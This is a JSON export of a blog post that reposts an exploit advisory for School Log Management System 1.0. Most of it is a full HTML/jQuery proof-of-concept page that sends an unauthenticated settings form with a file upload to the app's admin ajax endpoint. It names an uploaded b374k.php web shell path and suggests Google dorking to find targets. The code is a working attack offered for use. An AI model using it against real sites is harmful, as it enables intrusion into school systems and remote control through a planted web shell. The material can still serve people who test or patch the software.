{"id":59171,"date":"2024-08-26T19:29:47","date_gmt":"2024-08-26T16:29:47","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180361\/slms10-exec.txt"},"modified":"2024-08-26T19:29:47","modified_gmt":"2024-08-26T16:29:47","slug":"school-log-management-system-1-0-sql-injection-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/school-log-management-system-1-0-sql-injection-code-execution\/","title":{"rendered":"School Log Management System 1.0 SQL Injection \/ Code Execution"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |<br \/>| # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/school-log-management-system_1.zip |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] Part 01 : about-us.php<\/p>\n[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 . <\/p>\n[+] Line 109 : Send the form data using fetch API (Set your target url)<\/p>\n[+] save payload as poc.html<\/p>\n[+] payload : <\/p>\n<p>&lt;!DOCTYPE html&gt;<br \/>&lt;html lang=&#8221;en&#8221;&gt;<\/p>\n<p>&lt;head&gt;<br \/>&lt;meta charset=&#8221;UTF-8&#8243;&gt;<br \/>&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width, initial-scale=1.0&#8243;&gt;<br \/>&lt;title&gt;Settings Management&lt;\/title&gt;<br \/>&lt;!&#8211; Froala Editor CSS &#8211;&gt;<br \/>&lt;link href=&#8221;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/froala-editor\/4.0.1\/css\/froala_editor.pkgd.min.css&#8221; rel=&#8221;stylesheet&#8221;&gt;<br \/>&lt;!&#8211; Bootstrap CSS &#8211;&gt;<br \/>&lt;link href=&#8221;https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/css\/bootstrap.min.css&#8221; rel=&#8221;stylesheet&#8221;&gt;<br \/>&lt;style&gt;<br \/>\/* Custom Styles *\/<br \/>#cimg {<br \/>max-width: 100%;<br \/>height: auto;<br \/>}<br \/>#preloader2 {<br \/>position: fixed;<br \/>top: 0;<br \/>left: 0;<br \/>width: 100%;<br \/>height: 100%;<br \/>background: rgba(0, 0, 0, 0.5);<br \/>display: flex;<br \/>justify-content: center;<br \/>align-items: center;<br \/>z-index: 9999;<br \/>}<br \/>.form-group {<br \/>margin-bottom: 1rem;<br \/>}<br \/>.form-group label {<br \/>display: block;<br \/>margin-bottom: .5rem;<br \/>}<br \/>.form-group input, .form-group textarea {<br \/>width: 100%;<br \/>padding: .5rem;<br \/>box-sizing: border-box;<br \/>}<br \/>&lt;\/style&gt;<br \/>&lt;\/head&gt;<\/p>\n<p>&lt;body&gt;<br \/>&lt;div class=&#8221;container&#8221;&gt;<br \/>&lt;form id=&#8221;manage-settings&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart\/form-data&#8221;&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label for=&#8221;name&#8221;&gt; Name&lt;\/label&gt;<br \/>&lt;input type=&#8221;text&#8221; id=&#8221;name&#8221; name=&#8221;name&#8221; required&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label for=&#8221;email&#8221;&gt;Email&lt;\/label&gt;<br \/>&lt;input type=&#8221;email&#8221; id=&#8221;email&#8221; name=&#8221;email&#8221; required&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label for=&#8221;contact&#8221;&gt;Contact&lt;\/label&gt;<br \/>&lt;input type=&#8221;tel&#8221; id=&#8221;contact&#8221; name=&#8221;contact&#8221; required&gt;<\/p>\n<p>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label for=&#8221;about&#8221;&gt;About Content&lt;\/label&gt;<br \/>&lt;textarea class=&#8221;text-jqte&#8221; id=&#8221;about&#8221; name=&#8221;about&#8221;&gt;&lt;\/textarea&gt;<br \/>&lt;\/div&gt;<br \/>&lt;div class=&#8221;form-group&#8221;&gt;<br \/>&lt;label for=&#8221;img&#8221;&gt;Cover Image&lt;\/label&gt;<br \/>&lt;input type=&#8221;file&#8221; id=&#8221;img&#8221; name=&#8221;img&#8221; accept=&#8221;image\/*&#8221; onchange=&#8221;displayImg(this, this)&#8221;&gt;<br \/>&lt;img id=&#8221;cimg&#8221; src=&#8221;&#8221; alt=&#8221;Selected Image Preview&#8221;&gt;<br \/>&lt;\/div&gt;<br \/>&lt;button type=&#8221;submit&#8221; class=&#8221;btn btn-primary&#8221;&gt;Save Settings&lt;\/button&gt;<br \/>&lt;\/form&gt;<br \/>&lt;\/div&gt;<\/p>\n<p>&lt;div class=&#8221;modal fade&#8221; id=&#8221;viewer_modal&#8221; role=&#8217;dialog&#8217;&gt;<br \/>&lt;div class=&#8221;modal-dialog modal-md&#8221; role=&#8221;document&#8221;&gt;<br \/>&lt;div class=&#8221;modal-content&#8221;&gt;<br \/>&lt;button type=&#8221;button&#8221; class=&#8221;btn-close&#8221; data-dismiss=&#8221;modal&#8221;&gt;&lt;span class=&#8221;fa fa-times&#8221;&gt;&lt;\/span&gt;&lt;\/button&gt;<br \/>&lt;img src=&#8221;&#8221; alt=&#8221;&#8221;&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<br \/>&lt;\/div&gt;<\/p>\n<p>&lt;!&#8211; jQuery &#8211;&gt;<br \/>&lt;script src=&#8221;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/3.6.0\/jquery.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;!&#8211; Froala Editor JS &#8211;&gt;<br \/>&lt;script src=&#8221;https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/froala-editor\/4.0.1\/js\/froala_editor.pkgd.min.js&#8221;&gt;&lt;\/script&gt;<br \/>&lt;!&#8211; Bootstrap JS (for modals) &#8211;&gt;<br \/>&lt;script src=&#8221;https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/js\/bootstrap.bundle.min.js&#8221;&gt;&lt;\/script&gt;<\/p>\n<p>&lt;script&gt;<br \/>function displayImg(input, _this) {<br \/>if (input.files &amp;&amp; input.files[0]) {<br \/>var reader = new FileReader();<br \/>reader.onload = function (e) {<br \/>$(&#8216;#cimg&#8217;).attr(&#8216;src&#8217;, e.target.result);<br \/>}<br \/>reader.readAsDataURL(input.files[0]);<br \/>}<br \/>}<\/p>\n<p>$(document).ready(function () {<br \/>const editorInstance = new FroalaEditor(&#8216;.text-jqte&#8217;);<br \/>});<\/p>\n<p>$(&#8216;#manage-settings&#8217;).submit(function (e) {<br \/>e.preventDefault();<br \/>start_load();<br \/>$.ajax({<br \/>url: &#8216;http:\/\/127.0.0.1\/slms\/admin\/ajax.php?action=save_settings&#8217;,<br \/>data: new FormData($(this)[0]),<br \/>cache: false,<br \/>contentType: false,<br \/>processData: false,<br \/>method: &#8216;POST&#8217;,<br \/>type: &#8216;POST&#8217;,<br \/>error: err =&gt; {<br \/>console.log(err);<br \/>},<br \/>success: function (resp) {<br \/>if (resp == 1) {<br \/>alert_toast(&#8216;Data successfully saved.&#8217;, &#8216;success&#8217;);<br \/>setTimeout(function () {<br \/>location.reload();<br \/>}, 1000);<br \/>}<br \/>}<br \/>});<br \/>});<\/p>\n<p>window.start_load = function () {<br \/>$(&#8216;body&#8217;).prepend(&#8216;&lt;div id=&#8221;preloader2&#8243;&gt;&lt;\/div&gt;&#8217;);<br \/>}<\/p>\n<p>window.end_load = function () {<br \/>$(&#8216;#preloader2&#8217;).fadeOut(&#8216;fast&#8217;, function () {<br \/>$(this).remove();<br \/>});<br \/>}<\/p>\n<p>window.viewer_modal = function ($src = &#8221;) {<br \/>start_load();<br \/>var t = $src.split(&#8216;.&#8217;);<br \/>t = t[1];<br \/>if (t == &#8216;mp4&#8217;) {<br \/>var view = $(&#8220;&lt;video src='&#8221; + $src + &#8220;&#8216; controls autoplay&gt;&lt;\/video&gt;&#8221;);<br \/>} else {<br \/>var view = $(&#8220;&lt;img src='&#8221; + $src + &#8220;&#8216; \/&gt;&#8221;);<br \/>}<br \/>$(&#8216;#viewer_modal .modal-content video,#viewer_modal .modal-content img&#8217;).remove();<br \/>$(&#8216;#viewer_modal .modal-content&#8217;).append(view);<br \/>$(&#8216;#viewer_modal&#8217;).modal({<br \/>show: true,<br \/>backdrop: &#8216;static&#8217;,<br \/>keyboard: false,<br \/>focus: true<br \/>});<br \/>end_load();<br \/>}<\/p>\n<p>window.uni_modal = function ($title = &#8221;, $url = &#8221;, $size = &#8220;&#8221;) {<br \/>start_load();<br \/>$.ajax({<br \/>url: $url,<br \/>error: err =&gt; {<br \/>console.log(err);<br \/>alert(&#8220;An error occurred&#8221;);<br \/>},<br \/>success: function (resp) {<br \/>if (resp) {<br \/>$(&#8216;#uni_modal .modal-title&#8217;).html($title);<br \/>$(&#8216;#uni_modal .modal-body&#8217;).html(resp);<br \/>if ($size != &#8221;) {<br \/>$(&#8216;#uni_modal .modal-dialog&#8217;).addClass($size);<br \/>} else {<br \/>$(&#8216;#uni_modal .modal-dialog&#8217;).removeAttr(&#8220;class&#8221;).addClass(&#8220;modal-dialog modal-md&#8221;);<br \/>}<br \/>$(&#8216;#uni_modal&#8217;).modal({<br \/>show: true,<br \/>backdrop: &#8216;static&#8217;,<br \/>keyboard: false,<br \/>focus: true<br \/>});<br \/>end_load();<br \/>}<br \/>}<br \/>});<br \/>}<\/p>\n<p>window._conf = function ($msg = &#8221;, $func = &#8221;, $params = []) {<br \/>$(&#8216;#confirm_modal #confirm&#8217;).attr(&#8216;onclick&#8217;, $func + &#8220;(&#8221; + $params.join(&#8216;,&#8217;) + &#8220;)&#8221;);<br \/>$(&#8216;#confirm_modal .modal-body&#8217;).html($msg);<br \/>$(&#8216;#confirm_modal&#8217;).modal(&#8216;show&#8217;);<br \/>}<\/p>\n<p>window.alert_toast = function ($msg = &#8216;TEST&#8217;, $bg = &#8216;success&#8217;) {<br \/>$(&#8216;#alert_toast&#8217;).removeClass(&#8216;bg-success bg-danger bg-info bg-warning&#8217;);<\/p>\n<p>if ($bg == &#8216;success&#8217;)<br \/>$(&#8216;#alert_toast&#8217;).addClass(&#8216;bg-success&#8217;);<br \/>if ($bg == &#8216;danger&#8217;)<br \/>$(&#8216;#alert_toast&#8217;).addClass(&#8216;bg-danger&#8217;);<br \/>if ($bg == &#8216;info&#8217;)<br \/>$(&#8216;#alert_toast&#8217;).addClass(&#8216;bg-info&#8217;);<br \/>if ($bg == &#8216;warning&#8217;)<br \/>$(&#8216;#alert_toast&#8217;).addClass(&#8216;bg-warning&#8217;);<\/p>\n<p>$(&#8216;#alert_toast .toast-body&#8217;).html($msg);<br \/>$(&#8216;#alert_toast&#8217;).toast({ delay: 3000 }).toast(&#8216;show&#8217;);<br \/>}<br \/>&lt;\/script&gt;<br \/>&lt;\/body&gt;<\/p>\n<p>&lt;\/html&gt;<\/p>\n[+] Path : background: url(admin\/assets\/uploads\/1724235960_b374k.php);<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/school-log-management-system_1.zip |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] Part 01 : about-us.php &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59171","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59171","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59171"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59171\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59171"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59171"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59171"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}